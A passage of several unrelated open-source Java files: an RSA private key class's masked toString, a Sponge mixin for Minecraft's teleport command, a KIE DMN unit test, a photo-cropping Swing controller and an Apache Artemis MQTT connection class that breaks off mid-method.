q.equals(that.getPrimeQ()) && dP.equals(that.getPrimeExponentP()) && dQ.equals(that.getPrimeExponentQ()) && qInv.equals(that.getCrtCoefficient()); } return false; } public String toString() { if (str == null) { String ls = (String) AccessController.doPrivileged (new GetPropertyAction("line.separator")); str = new StringBuilder(this.getClass().getName()).append("(") .append(super.toString()).append(",").append(ls) .append("d=0x").append(Configuration.DEBUG ? d.toString(16) : "**...*").append(ls) .append("p=0x").append(Configuration.DEBUG ? p.toString(16) : "**...*").append(ls) .append("q=0x").append(Configuration.DEBUG ? q.toString(16) : "**...*").append(ls) .append("dP=0x").append(Configuration.DEBUG ? dP.toString(16) : "**...*").append(ls) .append("dQ=0x").append(Configuration.DEBUG ? dQ.toString(16) : "**...*").append(ls) .append("qInv=0x").append(Configuration.DEBUG ? qInv.toString(16) : "**...*").append(ls) .append(")") .toString(); } return str; } }
/* * This file is part of Sponge, licensed under the MIT License (MIT). * * Copyright (c) SpongePowered <https://www.spongepowered.org> * Copyright (c) contributors * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ package org.spongepowered.common.mixin.core.command.server; import com.flowpowered.math.vector.Vector3d; import net.minecraft.command.CommandBase; import net.minecraft.command.CommandException; import net.minecraft.command.CommandTP; import net.minecraft.command.ICommandSender; import net.minecraft.command.WrongUsageException; import net.minecraft.entity.Entity; import net.minecraft.entity.EntityLivingBase; import net.minecraft.entity.player.EntityPlayerMP; import net.minecraft.network.play.server.SPacketPlayerPosLook; import net.minecraft.server.MinecraftServer; import net.minecraft.util.math.MathHelper; import org.spongepowered.api.event.entity.MoveEntityEvent; import org.spongepowered.asm.mixin.Mixin; import org.spongepowered.asm.mixin.Overwrite; import org.spongepowered.common.entity.EntityUtil; import java.util.EnumSet; import java.util.Set; @Mixin(CommandTP.class) public abstract class MixinCommandTP extends CommandBase { // This boolean is added in order to make minimal changes to 'execute'. // It is set to true if the events fired in 'teleportEntityToCoordinates' are not cancelled. // This allows us to prevent calling 'notifyCommandListener' if the event is cancelled. private static boolean shouldNotifyCommandListener = false; /** * @author blood - May 31st, 2016 * @author gabizou - May 31st, 2016 - Update to 1.9.4 * @author Aaron1011 - August 15, 2016 - Update to 1.10.2 * @reason to fix LVT errors with SpongeForge * * @param sender The command source * @param args The command arguments */ @Override @Overwrite public void execute(MinecraftServer server, ICommandSender sender, String[] args) throws CommandException { if (args.length < 1) { throw new WrongUsageException("commands.tp.usage", new Object[0]); } else { int i = 0; Entity entity; if (args.length != 2 && args.length != 4 && args.length != 6) { entity = getCommandSenderAsPlayer(sender); } else { entity = getEntity(server, sender, args[0]); i = 1; } if (args.length != 1 && args.length != 2) { if (args.length < i + 3) { throw new WrongUsageException("commands.tp.usage", new Object[0]); } else if (entity.world != null) { // int j = 4096; int lvt_6_2_ = i + 1; CommandBase.CoordinateArg commandbase$coordinatearg = parseCoordinate(entity.posX, args[i], true); CommandBase.CoordinateArg commandbase$coordinatearg1 = parseCoordinate(entity.posY, args[lvt_6_2_++], -4096, 4096, false); CommandBase.CoordinateArg commandbase$coordinatearg2 = parseCoordinate(entity.posZ, args[lvt_6_2_++], true); CommandBase.CoordinateArg commandbase$coordinatearg3 = parseCoordinate((double)entity.rotationYaw, args.length > lvt_6_2_ ? args[lvt_6_2_++] : "~", false); CommandBase.CoordinateArg commandbase$coordinatearg4 = parseCoordinate((double)entity.rotationPitch, args.length > lvt_6_2_ ? args[lvt_6_2_] : "~", false); // Sponge start - check shouldNotifyCommandListener before calling 'notifyCommandListener' // Guard against any possible re-entrance boolean shouldNotify = shouldNotifyCommandListener; teleportEntityToCoordinates(entity, commandbase$coordinatearg, commandbase$coordinatearg1, commandbase$coordinatearg2, commandbase$coordinatearg3, commandbase$coordinatearg4); if (shouldNotifyCommandListener) { notifyCommandListener(sender, this, "commands.tp.success.coordinates", new Object[] {entity.getName(), Double.valueOf(commandbase$coordinatearg.getResult()), Double.valueOf(commandbase$coordinatearg1.getResult()), Double.valueOf(commandbase$coordinatearg2.getResult())}); } shouldNotifyCommandListener = shouldNotify; // Sponge end } } else { Entity entity1 = getEntity(server, sender, args[args.length - 1]); if (entity1.world != entity.world) { throw new CommandException("commands.tp.notSameDimension", new Object[0]); } else { entity.dismountRidingEntity(); if (entity instanceof EntityPlayerMP) { // Sponge start EntityPlayerMP player = (EntityPlayerMP) entity; MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(entity, entity1.posX, entity1.posY, entity1.posZ, entity1.rotationYaw, entity1.rotationPitch); if (event.isCancelled()) { return; } Vector3d position = event.getToTransform().getPosition(); player.connection.setPlayerLocation(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch()); // Sponge end } else { // Sponge Start - Events MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(entity, entity1.posX, entity1.posY, entity1.posZ, entity1.rotationYaw, entity1.rotationPitch); if (event.isCancelled()) { return; } Vector3d position = event.getToTransform().getPosition(); entity.setLocationAndAngles(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch()); // Sponge End } notifyCommandListener(sender, this, "commands.tp.success", new Object[] {entity.getName(), entity1.getName()}); } } } } /** * @author Aaron1011 - August 15, 2016 * @reason Muliple modification points are needed, so an overwrite is easier */ @Overwrite private static void teleportEntityToCoordinates(Entity p_189863_0_, CommandBase.CoordinateArg p_189863_1_, CommandBase.CoordinateArg p_189863_2_, CommandBase.CoordinateArg p_189863_3_, CommandBase.CoordinateArg p_189863_4_, CommandBase.CoordinateArg p_189863_5_) { if (p_189863_0_ instanceof EntityPlayerMP) { Set<SPacketPlayerPosLook.EnumFlags> set = EnumSet.<SPacketPlayerPosLook.EnumFlags>noneOf(SPacketPlayerPosLook.EnumFlags.class); if (p_189863_1_.isRelative()) { set.add(SPacketPlayerPosLook.EnumFlags.X); } if (p_189863_2_.isRelative()) { set.add(SPacketPlayerPosLook.EnumFlags.Y); } if (p_189863_3_.isRelative()) { set.add(SPacketPlayerPosLook.EnumFlags.Z); } if (p_189863_5_.isRelative()) { set.add(SPacketPlayerPosLook.EnumFlags.X_ROT); } if (p_189863_4_.isRelative()) { set.add(SPacketPlayerPosLook.EnumFlags.Y_ROT); } float f = (float)p_189863_4_.getAmount(); if (!p_189863_4_.isRelative()) { f = MathHelper.wrapDegrees(f); } float f1 = (float)p_189863_5_.getAmount(); if (!p_189863_5_.isRelative()) { f1 = MathHelper.wrapDegrees(f1); } // Sponge start EntityPlayerMP player = (EntityPlayerMP) p_189863_0_; double x = p_189863_1_.getAmount(); double y = p_189863_2_.getAmount(); double z = p_189863_3_.getAmount(); MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(player, x, y, z, f, f1); if (event.isCancelled()) { return; } p_189863_0_.dismountRidingEntity(); Vector3d position = event.getToTransform().getPosition(); ((EntityPlayerMP)p_189863_0_).connection.setPlayerLocation(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch(), set); p_189863_0_.setRotationYawHead((float) event.getToTransform().getYaw()); // Sponge end } else { float f2 = (float)MathHelper.wrapDegrees(p_189863_4_.getResult()); float f3 = (float)MathHelper.wrapDegrees(p_189863_5_.getResult()); f3 = MathHelper.clamp(f3, -90.0F, 90.0F); // Sponge start double x = p_189863_1_.getResult(); double y = p_189863_2_.getResult(); double z = p_189863_3_.getResult(); MoveEntityEvent.Teleport event = EntityUtil.handleDisplaceEntityTeleportEvent(p_189863_0_, x, y, z, f2, f3); if (event.isCancelled()) { return; } Vector3d position = event.getToTransform().getPosition(); p_189863_0_.setLocationAndAngles(position.getX(), position.getY(), position.getZ(), (float) event.getToTransform().getYaw(), (float) event.getToTransform().getPitch()); p_189863_0_.setRotationYawHead((float) event.getToTransform().getYaw()); // Sponge end } if (!(p_189863_0_ instanceof EntityLivingBase) || !((EntityLivingBase)p_189863_0_).isElytraFlying()) { p_189863_0_.motionY = 0.0D; p_189863_0_.onGround = true; } // Sponge start - set 'shouldNotifyCommandListener' to 'true' if we make it to the end of the method (the event wasn't cancelled) shouldNotifyCommandListener = true; // Sponge end } }
/* * Copyright 2018 Red Hat, Inc. and/or its affiliates. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kie.workbench.common.dmn.client.commands.expressions.types.relation; import java.util.Optional; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.kie.workbench.common.dmn.api.definition.v1_1.InformationItem; import org.kie.workbench.common.dmn.api.definition.v1_1.List; import org.kie.workbench.common.dmn.api.definition.v1_1.LiteralExpression; import org.kie.workbench.common.dmn.api.definition.v1_1.Relation; import org.kie.workbench.common.dmn.client.editors.expressions.types.relation.RelationColumn; import org.kie.workbench.common.dmn.client.editors.expressions.types.relation.RelationUIModelMapper; import org.kie.workbench.common.dmn.client.widgets.grid.controls.list.ListSelectorView; import org.kie.workbench.common.dmn.client.widgets.grid.model.DMNGridRow; import org.kie.workbench.common.stunner.core.client.canvas.AbstractCanvasHandler; import org.kie.workbench.common.stunner.core.client.command.CanvasCommandResultBuilder; import org.kie.workbench.common.stunner.core.client.command.CanvasViolation; import org.kie.workbench.common.stunner.core.command.Command; import org.kie.workbench.common.stunner.core.graph.command.GraphCommandExecutionContext; import org.kie.workbench.common.stunner.core.graph.command.GraphCommandResultBuilder; import org.kie.workbench.common.stunner.core.rule.RuleManager; import org.kie.workbench.common.stunner.core.rule.RuleViolation; import org.mockito.Mock; import org.mockito.runners.MockitoJUnitRunner; import org.uberfire.ext.wires.core.grids.client.model.GridData; import org.uberfire.ext.wires.core.grids.client.model.impl.BaseGridData; import org.uberfire.ext.wires.core.grids.client.widget.grid.columns.RowNumberColumn; import static org.junit.Assert.assertEquals; import static org.mockito.Mockito.doReturn; import static org.mockito.Mockito.mock; import static org.mockito.Mockito.reset; import static org.mockito.Mockito.spy; import static org.mockito.Mockito.verify; @RunWith(MockitoJUnitRunner.class) public class DeleteRelationColumnCommandTest { private static final String VALUE = "value"; @Mock private RowNumberColumn uiRowNumberColumn; @Mock private RelationColumn uiModelColumn; @Mock private ListSelectorView.Presenter listSelector; @Mock private org.uberfire.mvp.Command canvasOperation; @Mock private AbstractCanvasHandler handler; @Mock private GraphCommandExecutionContext gce; @Mock private RuleManager ruleManager; private Relation relation; private InformationItem informationItem; private GridData uiModel; private RelationUIModelMapper uiModelMapper; private DeleteRelationColumnCommand command; @Before public void setup() { this.relation = new Relation(); this.informationItem = new InformationItem(); this.relation.getColumn().add(informationItem); this.uiModel = new BaseGridData(); this.uiModel.appendColumn(uiRowNumberColumn); this.uiModel.appendColumn(uiModelColumn); doReturn(ruleManager).when(handler).getRuleManager(); doReturn(0).when(uiRowNumberColumn).getIndex(); doReturn(1).when(uiModelColumn).getIndex(); this.uiModelMapper = new RelationUIModelMapper(() -> uiModel, () -> Optional.of(relation), listSelector); } private void makeCommand(final int uiColumnIndex) { this.command = spy(new DeleteRelationColumnCommand(relation, uiModel, uiColumnIndex, uiModelMapper, canvasOperation)); } private void makeCommand() { makeCommand(1); } @Test public void testGraphCommandAllow() { makeCommand(); final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler); assertEquals(GraphCommandResultBuilder.SUCCESS, c.allow(gce)); } @Test public void testGraphCommandExecuteWithRows() { relation.getRow().add(new List()); relation.getRow().get(0).getExpression().add(new LiteralExpression()); makeCommand(); final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler); assertEquals(GraphCommandResultBuilder.SUCCESS, c.execute(gce)); assertEquals(0, relation.getColumn().size()); assertEquals(1, relation.getRow().size()); assertEquals(0, relation.getRow().get(0).getExpression().size()); } @Test public void testGraphCommandExecuteDeleteMiddleWithRows() { uiModel.appendColumn(mock(RelationColumn.class)); uiModel.appendColumn(mock(RelationColumn.class)); relation.getColumn().add(new InformationItem()); relation.getColumn().add(new InformationItem()); relation.getRow().add(new List()); final LiteralExpression firstExpression = new LiteralExpression(); final LiteralExpression lastExpression = new LiteralExpression(); relation.getRow().get(0).getExpression().add(firstExpression); relation.getRow().get(0).getExpression().add(new LiteralExpression()); relation.getRow().get(0).getExpression().add(lastExpression); makeCommand(2); final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler); assertEquals(GraphCommandResultBuilder.SUCCESS, c.execute(gce)); assertEquals(2, relation.getColumn().size()); assertEquals(1, relation.getRow().size()); assertEquals(2, relation.getRow().get(0).getExpression().size()); assertEquals(firstExpression, relation.getRow().get(0).getExpression().get(0)); assertEquals(lastExpression, relation.getRow().get(0).getExpression().get(1)); } @Test public void testGraphCommandExecuteWithNoRows() { makeCommand(); final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler); assertEquals(GraphCommandResultBuilder.SUCCESS, c.execute(gce)); assertEquals(0, relation.getColumn().size()); assertEquals(0, relation.getRow().size()); } @Test public void testGraphCommandUndoWithRows() { relation.getRow().add(new List()); final LiteralExpression literalExpression = new LiteralExpression(); literalExpression.setText(VALUE); relation.getRow().get(0).getExpression().add(literalExpression); makeCommand(); final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler); //Delete column and then undo assertEquals(GraphCommandResultBuilder.SUCCESS, c.execute(gce)); assertEquals(GraphCommandResultBuilder.SUCCESS, c.undo(gce)); assertEquals(1, relation.getColumn().size()); assertEquals(1, relation.getRow().size()); assertEquals(1, relation.getRow().get(0).getExpression().size()); assertEquals(VALUE, ((LiteralExpression) relation.getRow().get(0).getExpression().get(0)).getText()); } @Test public void testGraphCommandUndoWithNoRows() { makeCommand(); final Command<GraphCommandExecutionContext, RuleViolation> c = command.newGraphCommand(handler); //Delete column and then undo assertEquals(GraphCommandResultBuilder.SUCCESS, c.execute(gce)); assertEquals(GraphCommandResultBuilder.SUCCESS, c.undo(gce)); assertEquals(1, relation.getColumn().size()); assertEquals(0, relation.getRow().size()); } @Test public void testCanvasCommandAllow() { makeCommand(); final Command<AbstractCanvasHandler, CanvasViolation> c = command.newCanvasCommand(handler); assertEquals(CanvasCommandResultBuilder.SUCCESS, c.allow(handler)); } @Test public void testCanvasCommandExecuteWithRows() { relation.getRow().add(new List()); relation.getRow().get(0).getExpression().add(new LiteralExpression()); uiModel.appendRow(new DMNGridRow()); uiModelMapper.fromDMNModel(0, 0); uiModelMapper.fromDMNModel(0, 1); makeCommand(); final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler); assertEquals(CanvasCommandResultBuilder.SUCCESS, cc.execute(handler)); assertEquals(1, uiModel.getColumnCount()); assertEquals(uiRowNumberColumn, uiModel.getColumns().get(0)); assertEquals(1, uiModel.getRowCount()); assertEquals(1, uiModel.getRows().get(0).getCells().size()); assertEquals(1, uiModel.getCell(0, 0).getValue().getValue()); verify(command).updateParentInformation(); verify(canvasOperation).execute(); } @Test public void testCanvasCommandExecuteWithNoRows() { makeCommand(); final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler); assertEquals(CanvasCommandResultBuilder.SUCCESS, cc.execute(handler)); assertEquals(1, uiModel.getColumnCount()); assertEquals(uiRowNumberColumn, uiModel.getColumns().get(0)); assertEquals(0, uiModel.getRowCount()); verify(command).updateParentInformation(); verify(canvasOperation).execute(); } @Test public void testCanvasCommandUndoWithRows() { relation.getRow().add(new List()); final LiteralExpression literalExpression = new LiteralExpression(); literalExpression.setText(VALUE); relation.getRow().get(0).getExpression().add(literalExpression); uiModel.appendRow(new DMNGridRow()); uiModelMapper.fromDMNModel(0, 1); makeCommand(); //Delete column and then undo final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler); assertEquals(CanvasCommandResultBuilder.SUCCESS, cc.execute(handler)); reset(command, canvasOperation); assertEquals(CanvasCommandResultBuilder.SUCCESS, cc.undo(handler)); assertEquals(2, uiModel.getColumnCount()); assertEquals(uiRowNumberColumn, uiModel.getColumns().get(0)); assertEquals(uiModelColumn, uiModel.getColumns().get(1)); assertEquals(1, uiModel.getRowCount()); assertEquals(1, uiModel.getRows().get(0).getCells().size()); assertEquals(VALUE, uiModel.getCell(0, 1).getValue().getValue()); verify(command).updateParentInformation(); verify(canvasOperation).execute(); } @Test public void testCanvasCommandUndoWithNoRows() { makeCommand(); //Delete column and then undo final Command<AbstractCanvasHandler, CanvasViolation> cc = command.newCanvasCommand(handler); assertEquals(CanvasCommandResultBuilder.SUCCESS, cc.execute(handler)); reset(command, canvasOperation); assertEquals(CanvasCommandResultBuilder.SUCCESS, cc.undo(handler)); assertEquals(2, uiModel.getColumnCount()); assertEquals(uiRowNumberColumn, uiModel.getColumns().get(0)); assertEquals(uiModelColumn, uiModel.getColumns().get(1)); assertEquals(0, uiModel.getRowCount()); verify(command).updateParentInformation(); verify(canvasOperation).execute(); } }
package org.crepi22.finecrop; import java.awt.event.ActionEvent; import java.awt.Desktop; import java.io.File; import java.io.IOException; import java.lang.reflect.InvocationTargetException; import java.net.URI; import java.net.URISyntaxException; import java.net.URL; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Stack; import javax.swing.AbstractAction; import javax.swing.Action; import javax.swing.Box; import javax.swing.ImageIcon; import javax.swing.JFrame; import javax.swing.JOptionPane; import javax.swing.JToolBar; import javax.swing.SwingUtilities; /** * @author pierre Controller for the behaviour of the application. */ public class Controller implements Continuation { static class FileAction { File file; FCAction action; FileAction history; FileAction(File file, FCAction action, FileAction history) { this.file = file; this.action = action; this.history = history; } public boolean equals(Object o) { if (!(o instanceof FileAction)) return false; FileAction other = (FileAction) o; return file.equals(other.file) && action.equals(other.action); } public int historySize() { FileAction cursor = this; int size = 0; while (cursor.history != null) { size++; cursor = cursor.history; } return size; } public File origin() { FileAction cursor = this; while (cursor.history != null) cursor = cursor.history; return cursor.file; } } class QuickRotation extends AbstractAction { private static final long serialVersionUID = 1L; private final int angle; QuickRotation(String name, String path, int angle) { super(name, makeIcon(path)); this.angle = angle; } @Override public void actionPerformed(ActionEvent arg0) { if (step == null) return; File file = step.file; currentAction = step.action; step = step.history; try { new Rotate(Controller.this, new Photo(file), angle).start(); } catch (IOException e) { Controller.this.error(Messages.getString("Controller.image_error") + file + ": " + e.getMessage()); //$NON-NLS-1$ //$NON-NLS-2$ } } } final private Action rotateAction = new AbstractAction(Messages.getString("Controller.Rotation_title"), makeIcon("rotate.png") ) { //$NON-NLS-1$ //$NON-NLS-2$ private static final long serialVersionUID = 1L; @Override public void actionPerformed(ActionEvent arg0) { if (step == null) return; File file = step.file; currentAction = step.action; step = step.history; photoView.setPhoto(file, FCAction.ROTATE); } }; final private Action cropAction = new AbstractAction(Messages.getString("Controller.Crop_title"), makeIcon("crop.png") ) { //$NON-NLS-1$ //$NON-NLS-2$ private static final long serialVersionUID = 1L; @Override public void actionPerformed(ActionEvent arg0) { if (step == null) return; File file = step.file; currentAction = step.action; step = step.history; photoView.setPhoto(file, FCAction.CROP); } }; final private Action multiAction = new AbstractAction(Messages.getString("Controller.Multiple_title"), makeIcon("multi.png") ) { //$NON-NLS-1$ //$NON-NLS-2$ private static final long serialVersionUID = 1L; @Override public void actionPerformed(ActionEvent arg0) { if (step == null) return; File file = step.file; currentAction = step.action; step = step.history; photoView.setPhoto(file, FCAction.MULTICROP); } }; final private Action settings = new AbstractAction(Messages.getString("Controller.Settings_Title"), makeIcon("settings.png") ) { //$NON-NLS-1$ //$NON-NLS-2$ private static final long serialVersionUID = 1L; @Override public void actionPerformed(ActionEvent arg0) { JFrame options = new ConfigPanel(); options.setVisible(true); } }; final private Action helpAction = new AbstractAction(Messages.getString("Controller.Help_Title"), makeIcon("help.png") ) { //$NON-NLS-1$ //$NON-NLS-2$ private static final long serialVersionUID = 1L; @Override public void actionPerformed(ActionEvent arg0) { String url = "https://github.com/crepi22/finecrop/wiki"; try { if (Desktop.isDesktopSupported()) { Desktop.getDesktop().browse(new URI(url)); } } catch (IOException | URISyntaxException e) { } } }; final private Action rot90 = new QuickRotation(Messages.getString("Controller.Rot_Left_Title"), "left.png", 90); //$NON-NLS-1$ //$NON-NLS-2$ final private Action rot270 = new QuickRotation(Messages.getString("Controller.Rot_Right_Title"), "right.png", 270); //$NON-NLS-1$ //$NON-NLS-2$ final private Action rot180 = new QuickRotation(Messages.getString("Controller.Upside_Down_Title"), "upsideDown.png", 180); //$NON-NLS-1$ //$NON-NLS-2$ final private PhotoView photoView; final private StateLine stateLine; final private List<File> allGenerated = new ArrayList<File>(); final private JFrame frame; private Stack<FileAction> todo = new Stack<FileAction>(); private FCAction currentAction; private FileAction step = null; /** * States of the system. */ final public static String STATES[] = { Messages.getString("Controller.Rotation_title"), //$NON-NLS-1$ Messages.getString("Controller.Crop_title"), //$NON-NLS-1$ Messages.getString("Controller.Multiple_title"), //$NON-NLS-1$ Messages.getString("Controller.Confirm_title") //$NON-NLS-1$ }; /** * What is written on the tooltips */ final public static String[] TOOLTIPS = { Messages.getString("Controller.Rotation_tooltip"), //$NON-NLS-1$ Messages.getString("Controller.Crop_tooltip"), //$NON-NLS-1$ Messages.getString("Controller.Multiple_tooltip"), //$NON-NLS-1$ Messages.getString("Controller.Confirm_tooltip") //$NON-NLS-1$ }; private TranslucentGlassPane glassPane; private Map<File, List<File>> finalResults = new HashMap<File, List<File>>(); Controller(JFrame frame, PhotoView view, StateLine stateLine, JToolBar toolbar) { this.frame = frame; this.photoView = view; this.stateLine = stateLine; toolbar.add(settings); toolbar.add(rotateAction); toolbar.add(cropAction); toolbar.add(multiAction); toolbar.add(rot90); toolbar.add(rot270); toolbar.add(rot180); toolbar.add(Box.createVerticalGlue()); toolbar.add(helpAction); view.setContinuation(this); glassPane = new TranslucentGlassPane(); frame.setGlassPane(glassPane); glassPane.setEnabled(false); glassPane.setVisible(true); } public void showEffect(final boolean b) { try { SwingUtilities.invokeAndWait(new Runnable() { @Override public void run() { photoView.setEnabled(!b); glassPane.setEnabled(b); } }); } catch (InterruptedException e) { } catch (InvocationTargetException e) { } } /* * (non-Javadoc) * @see org.crepi22.finecrop.Continuation#runFile(java.io.File) */ @Override public void runFile(File file) { if (currentAction != null) todo.push(new FileAction(file, currentAction, step)); else { File origin = step.origin(); List<File> results = getResults(origin); results.add(file); } doNext(); } /* * (non-Javadoc) * @see org.crepi22.finecrop.Continuation#runFiles(java.util.List) */ @Override public void runFiles(List<File> files) { allGenerated.addAll(files); if (currentAction != null) { for (File file : files) { System.out.println(file); todo.push(new FileAction(file, currentAction, step)); } } else { File origin = step.origin(); List<File> results = getResults(origin); results.addAll(files); } doNext(); } /** * Main entry point to perform a list of operations on a file. * * @param files the files * @param mode the mode the list of operations to perform. This can generate a tree of sub files. */ public void perform(List<File> files, FCAction mode) { for (File file : files) { todo.push(new FileAction(file, mode, null)); } doNext(); } private List<File> getResults(File origin) { List<File> results = finalResults.get(origin); if (results == null) { results = new ArrayList<File>(); finalResults.put(origin, results); } return results; } private void normalizeFilenames() { for(Map.Entry<File, List<File>> fileEntry : finalResults.entrySet()) { File originFile = fileEntry.getKey(); List<File> generatedList = fileEntry.getValue(); File bakFile = FileUtil.bakFile(originFile); originFile.renameTo(bakFile); try { if (generatedList.size() == 1) { File generated = generatedList.get(0); if (generated.equals(originFile)) generated = bakFile; FileUtil.copyFile(generated, originFile); } else { int index = 0; for (File generated : generatedList) { if (generated.equals(originFile)) generated = bakFile; File versioned; do { versioned = FileUtil.versionFile(originFile, index++); } while (versioned.exists()); FileUtil.copyFile(generated, versioned); } } } catch (IOException e) { } } } private void doNext() { if (todo.isEmpty()) { normalizeFilenames(); for(File generated: allGenerated) generated.delete(); frame.dispose(); } else { step = todo.pop(); stateLine.setState(step.historySize()); FCAction action = step.action; File file = step.file; currentAction = action.continuation; photoView.setPhoto(file, action.kind); } } @Override public void cancel() { FileAction history = step.history; if (history != null) { // here we remove all the tasks with the same history step while(!todo.empty() && todo.peek().history == history) todo.pop(); // we push back this history on the stack todo.push(history); } else { int option = JOptionPane .showConfirmDialog( frame, Messages.getString("Controller.Cancel_question"), //$NON-NLS-1$ Messages.getString("Controller.Cancel_title"), JOptionPane.YES_NO_OPTION, //$NON-NLS-1$ JOptionPane.QUESTION_MESSAGE); if (option != JOptionPane.YES_OPTION) { todo.push(step); } } doNext(); } /** * Sets the current action. * * @param currentAction the currentAction to set */ public void setCurrentAction(FCAction currentAction) { this.currentAction = currentAction; } @Override public void error(String error) { JOptionPane.showConfirmDialog(frame, error, Messages.getString("Controller.Error_title"), JOptionPane.DEFAULT_OPTION, JOptionPane.WARNING_MESSAGE); //$NON-NLS-1$ if (step.history !=null) todo.push(step.history); doNext(); } private ImageIcon makeIcon(String name) { URL url = getClass().getResource("images/" + name); //$NON-NLS-1$ return new ImageIcon(url); } }
/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.activemq.artemis.core.protocol.mqtt; import java.util.ArrayList; import java.util.List; import java.util.concurrent.CopyOnWriteArrayList; import java.util.concurrent.Future; import java.util.concurrent.FutureTask; import java.util.concurrent.atomic.AtomicBoolean; import org.apache.activemq.artemis.api.core.ActiveMQBuffer; import org.apache.activemq.artemis.api.core.ActiveMQException; import org.apache.activemq.artemis.api.core.SimpleString; import org.apache.activemq.artemis.core.remoting.CloseListener; import org.apache.activemq.artemis.core.remoting.FailureListener; import org.apache.activemq.artemis.spi.core.protocol.RemotingConnection; import org.apache.activemq.artemis.spi.core.remoting.Connection; import org.apache.activemq.artemis.spi.core.remoting.ReadyListener; import javax.security.auth.Subject; public class MQTTConnection implements RemotingConnection { private final Connection transportConnection; private final long creationTime; private AtomicBoolean dataReceived; private boolean destroyed; private boolean connected; private String clientID; private final List<FailureListener> failureListeners = new CopyOnWriteArrayList<>(); private final List<CloseListener> closeListeners = new CopyOnWriteArrayList<>(); private Subject subject; private int receiveMaximum = -1; private String protocolVersion; public MQTTConnection(Connection transportConnection) throws Exception { this.transportConnection = transportConnection; this.creationTime = System.currentTimeMillis(); this.dataReceived = new AtomicBoolean(); this.destroyed = false; transportConnection.setProtocolConnection(this); } @Override public void scheduledFlush() { flush(); } @Override public boolean isWritable(ReadyListener callback) { return transportConnection.isWritable(callback) && transportConnection.isOpen(); } @Override public Object getID() { return transportConnection.getID(); } @Override public long getCreationTime() { return creationTime; } @Override public String getRemoteAddress() { return transportConnection.getRemoteAddress(); } @Override public void addFailureListener(FailureListener listener) { failureListeners.add(listener); } @Override public boolean removeFailureListener(FailureListener listener) { return failureListeners.remove(listener); } @Override public void addCloseListener(CloseListener listener) { closeListeners.add(listener); } @Override public boolean removeCloseListener(CloseListener listener) { return closeListeners.remove(listener); } @Override public List<CloseListener> removeCloseListeners() { List<CloseListener> deletedCloseListeners = copyCloseListeners(); closeListeners.clear(); return deletedCloseListeners; } @Override public void setCloseListeners(List<CloseListener> listeners) { closeListeners.clear(); closeListeners.addAll(listeners); } @Override public List<FailureListener> getFailureListeners() { return failureListeners; } @Override public List<FailureListener> removeFailureListeners() { List<FailureListener> deletedFailureListeners = copyFailureListeners(); failureListeners.clear(); return deletedFailureListeners; } @Override public void setFailureListeners(List<FailureListener> listeners) { failureListeners.clear(); failureListeners.addAll(listeners); } @Override public ActiveMQBuffer createTransportBuffer(int size) { return transportConnection.createTransportBuffer(size); } @Override public void fail(ActiveMQException me) { List<FailureListener> copy = copyFailureListeners(); for (FailureListener listener : copy) { listener.connectionFailed(me, false); } transportConnection.close(); } private List<FailureListener> copyFailureListeners() { return new ArrayList<>(failureListeners); } private List<CloseListener> copyCloseListeners() { return new ArrayList<>(closeListeners); } @Override public void fail(ActiveMQException me, String scaleDownTargetNodeID) { synchronized (failureListeners) { for (FailureListener listener : failureListeners) { //FIXME(mtaylor) How do we check if the node has failed over? listener.connectionFailed(me, false); } } } @Override public Future asyncFail(ActiveMQException me) { FutureTask<Void> task = new FutureTask(() -> { fail(me); return null; }); // I don't expect asyncFail happening on MQTT, in case of happens this is semantically correct Thread t = new Thread(task); t.start(); return task; } @Override public void destroy() { destroyed = true; disconnect(false); } @Override public Connection 